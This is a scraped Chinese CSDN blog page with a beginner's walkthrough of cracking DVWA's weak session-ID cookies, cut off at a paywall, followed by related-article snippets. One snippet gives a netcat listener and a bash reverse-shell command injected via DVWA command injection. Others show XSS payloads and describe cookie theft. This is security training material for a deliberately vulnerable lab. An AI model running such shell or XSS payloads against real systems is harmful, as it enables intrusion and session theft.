Dvwa 弱cookie模块攻略心得

最新推荐文章于 2023-09-15 23:29:58 发布
最新推荐文章于 2023-09-15 23:29:58 发布
阅读量643 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38566606/article/details/84873422
版权
本文介绍了DVWA中的弱cookie漏洞,包括Low、Medium和High三个级别。通过抓包分析,揭示了cookie生成的规律,对于Low级别,cookie是dcwasession数值递增;Medium级别涉及时间戳计算;High级别则是md5加密的序列号。通过理解这些规律,可以了解如何构造和破解弱cookie。
摘要由CSDN通过智能技术生成

求生欲很强的前言╭(╯^╰)╮

 各位大佬们,我只是个小白,如果文章内有写的不对的地方请告诉我,但请不要喷。。。不要喷,我们都是文明人,不做花洒,不做喷子,关爱小白从我做起 Orz

 

 

弱cookie

这个模块貌似(不确定)1.9初期就有了,但是到目前为止网上都没有什么攻略。可能是大佬们觉得比较简单吧。

这个模块只要我们自己能找到cookie的生成规律,并且能推断下一个cookie就算成功了。我们需要使用的工具主要是抓包软件和Chrome浏览器的F12功能。

Low

这是一个显而易见cookie生成规律。

我们点击生成cookie的按钮,分析每次抓包的内容,我选取了两个数据包作为对照:

我比较笨,到第9次抓包才发现规律。我们应优先观察cookie数值,因为我们主要是要找到cookie的生成规律,发现Cookie只是在dcwasession的数值基础上+1,Phpsessid没有变化,且没有其他参数,因此容易构造cookie以及其他用户的cookie。

规律:dvwasession(这次的)=

最低0.47元/天 解锁文章
zikun_96
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【Web安全】Weak Session IDs (会话IDs)-burp进行Cookie劫持
李响
03-23 856
文章目录1 Weak Session IDs(会话IDs)2 DVWA-low3 medium级别4 high级别 1 Weak Session IDs(会话IDs) 0x01 何为Weak Session IDs 当用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带 Sesion去访问。 sessionID作为特定用户访问站点所需要...
DVWA(LOW)学习心得【持续更新】
MZEPSan的博客
12-10 1134
应学长要求,开始学习DVWA的有关知识。虽然临近期末,但是感觉拿来在休闲时间玩玩还是挺好的。如果写得有什么问题,希望各位师傅能予以指正。 第一部分:SQL注入 登上平台之后打开如下页面: 就一个输入框真的看不出什么,看看代码吧… 先贴代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_R...
Linux系统安装配置XAMPP和DVWA 学习心得
tuzi0739的博客
03-27 744
准备好XAMPP 和DVWA 软件如果是.run文件直接./xampp.run 跟着图像下一步就好了如果是tar文件#tar -zxvf xampp.tar -C /opt将DVWA 文件解压到xampp下的htdocs文件夹下面 改名为dvwa#/opt/lampp/lampp start  //启动服务用浏览器访问127.0.0.1或者localhost进phpmyadmin 设置数据库添加用...
DVWA 通关指南:Weak Session IDs (会话)
weixin_50464560的博客
07-29 794
DVWA 通关指南:Weak Session IDs (会话) 目录 Weak Session IDs (会话) Low Level 源码审计 攻击方式 Medium Level 源码审计 攻击方式 High Level 源码审计 攻击方式 Impossible Level 总结与防御 参考资料 Weak Session IDs (会话) Knowledge of a session ID is often the only thing required to access a site as a s
DVWA XSS 盗取cookie实战
沐目的博客
07-13 2814
DVWA XSS 盗取cookie实战 今天把dvwa的XSS的漏洞又给利用了一下,以前都是弹个框就没了,这次要试试盗cookie。这次说一个东西,很基础的东西,但我也是现在才明白,就是关于html编码,绕过过滤的事情。以前总感觉HTML编码绕过滤,这个方法时灵时不灵,直到现在,才发现原来是自己的问题。 这个东西要么用十六进制&#X**,要么用十进制&#ASCLL,我以前竟然傻的直...
DVWA-master.7z 压缩包
09-14
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,设计用于帮助安全专业人员测试他们的安全技能和工具,同时也为开发人员提供一个平台来了解常见Web应用漏洞的本质。这个"DVWA-master.7z"压缩包...
漏洞演示系统DVWA渗透测试攻略
07-15
漏洞演示系统DVWA(Damn Vulnerable Web Application) V1.8渗透测试攻略
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
DVWA-master.zip
01-04
除了上述常见漏洞外,DVWA还包括如“口令”、“CSRF(跨站请求伪造)”、“不安全的直接对象引用”等其他安全挑战,这些都为学习者提供了全面的安全训练。 7. **实践与挑战** 通过DVWA,你可以模拟黑客的攻击...
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
2.XSS漏洞(获取用户的cookie)——小白笔记——DVWA
qwsn
11-17 2442
0x01:用户的cookie 1.cookie:在浏览器端存储用户身份信息的一种机制 2.用户信息包含:用户名和密码(经过加密处理保存在cookie) 0x02:检测实例1 1.检测1: <script>alert('hack u')</script> //检测 2.检测2: <script>for(var i=0;i<100000;i...
[小迪安全34天]登录和脆cookie和支付
weixin_54252904的博客
06-12 314
登录与脆cookie和支付HTTP登录HTTPS登录演示脆cookie登录支付漏洞商品数量订单编号商品价格商品ID支付接口修复方案 HTTP登录 http登录是以明文来传输的,但不全是 但大部分都是明文如: 爆破http登录,直接上字典就行了,不需要变换密码格式,但如果对方网站的是以密文传输,则相应的你要把密码转换为相应的密文 HTTPS登录 https登录是以密文的形式:如百度登录 如果要爆破https登录的话,就需要知道他的加密方式,把密码字典转换成相应的密文格式 演示 随便输入一个密
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1403
好切回正题,这段代码的是正则表达意思就是把这些'/
DVWA关卡9:Weak Session IDs(会话IDS)
m0_54899775的博客
12-08 1618
DVWA关卡9:Weak Session IDs(会话IDS)
DVWA靶机,通过XSS盗取cookie登录
最新发布
weixin_42786460的博客
09-15 1029
DVWA靶机,通过XSS盗取cookie登录
【网络安全】XSS之Cookie外带攻击姿势及例题详析
等风来
05-19 7163
XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
信息收集&命令注入&反序列化(dvwa)
LztCode
11-24 706
信息收集 zoomeye 钟馗之眼 shodan 撒旦 fofa 采用hash搜索标签页上面的小图片 http.favicon.hash:-842852785 命令注入 dvwa的命令执行漏洞利用 测试是否存在命令注入 127.0.0.1 | winver 反弹shell kali监听7777端口 nc -lvp 7777 注:测试环境Ubuntu虚拟机 dvwa命令注入输入 ;bash -i >& /dev/tcp/kali的ip地址/7777 0>&1 反序列化(对象注入)
【渗透练习系列】DVWA靶机实战,通过XSS盗取cookie登录-02
书山上的云的博客
03-16 7563
一、发现XSS漏洞 1.1 登录DVWA,找到XSS(DOM)模块,测试XSS是否存在。 1.2 在选项的传参后面加入一串js代码,也就是可以XSS弹出的代码。payload如下: <script>alert(/xss/)</script> 发现可以弹窗,证明此处存在XSS。 二、盗取cookie 2.1 在XSS平台上搭建一个测试项目。这用的是免费的XSS平台: https://xssaq.com/xss.php 选择【我的项目】->【创建】,创建一个测试项目: 2.2
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 3549
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
存储型xss dvwa窃取cookie
06-06
存储型XSS攻击是一种利用网站漏洞,将恶意脚本存储在服务器上,当其他用户访问该网站时,恶意脚本会被执行,从而实现攻击者的目的。在DVWA中,攻击者可以通过在留言板或评论区等存储用户输入的地方,插入恶意脚本,从而窃取其他用户的cookie信息。这种攻击方式对网站的安全性造成了很大的威胁,需要网站管理员及时修复漏洞,加强网站的安全性防护。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值